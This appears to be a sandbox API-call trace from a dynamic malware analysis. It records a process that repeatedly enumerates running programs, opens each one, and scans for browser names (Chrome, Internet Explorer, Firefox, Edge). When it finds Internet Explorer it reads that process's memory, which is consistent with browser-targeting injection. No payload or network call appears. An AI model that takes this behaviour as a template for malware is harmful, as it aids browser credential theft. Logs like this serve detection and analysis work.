	[0201.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.023] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.024] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0201.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.024] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.024] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0201.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1e40
	[0201.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.025] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0201.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.026] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.026] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0201.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.027] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0201.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1e44
	[0201.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.028] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0201.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.028] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.029] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0201.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.030] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.030] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0201.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1e48
	[0201.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.031] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0201.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.031] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.031] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0201.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.031] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0201.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1e4c
	[0201.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.032] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0201.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.033] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.033] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0201.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.034] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.034] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0201.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1e50
	[0201.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.035] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0201.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.035] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.036] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0201.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.036] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0201.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1e54
	[0201.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.037] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0201.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.037] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.038] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0201.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.038] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0201.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1e58
	[0201.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.039] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0201.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.039] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.040] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0201.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.040] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.040] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0201.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1e5c
	[0201.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.041] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0201.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.041] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.042] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0201.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.042] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0201.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1e60
	[0201.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.043] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0201.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.044] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.045] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0201.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.045] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.046] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0201.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1e64
	[0201.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.046] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0201.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.047] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.047] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0201.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.048] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.048] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0201.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1e68
	[0201.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.049] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0201.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.050] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.050] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0201.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.051] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.051] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0201.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1e6c
	[0201.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.052] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0201.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.053] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.053] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0201.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.062] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.062] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1e70
	[0201.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.063] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.063] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.064] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.064] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.064] NtQueryInformationProcess (in: ProcessHandle=0x1e70, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.064] ReadProcessMemory (in: hProcess=0x1e70, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.064] ReadProcessMemory (in: hProcess=0x1e70, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.064] ReadProcessMemory (in: hProcess=0x1e70, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.064] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.065] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0201.065] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1e74
	[0201.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.065] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0201.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.066] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0201.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.066] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0201.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.066] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.066] NtQueryInformationProcess (in: ProcessHandle=0x1e74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0201.067] ReadProcessMemory (in: hProcess=0x1e74, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0201.067] ReadProcessMemory (in: hProcess=0x1e74, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0201.067] ReadProcessMemory (in: hProcess=0x1e74, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0201.067] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0201.067] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1e78
	[0201.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.068] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.068] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.068] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.069] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.069] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0201.070] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1e7c
	[0201.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.070] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0201.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.070] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.070] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0201.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.071] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.071] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1e80
	[0201.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.072] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.072] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.072] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.073] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.073] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.074] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0201.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1e84
	[0201.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.074] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.075] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.075] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.075] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.075] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1e88
	[0201.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.076] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.077] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.077] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.077] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.077] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0201.078] CloseHandle (hObject=0x188) returned 1
	[0201.078] Sleep (dwMilliseconds=0x64) 
	[0201.179] GetCurrentProcessId () returned 0x110
	[0201.179] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0201.181] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0201.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0201.183] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0201.183] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1e8c
	[0201.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.183] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.184] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.184] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.184] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.185] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1e90
	[0201.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.185] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.186] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.186] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.186] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
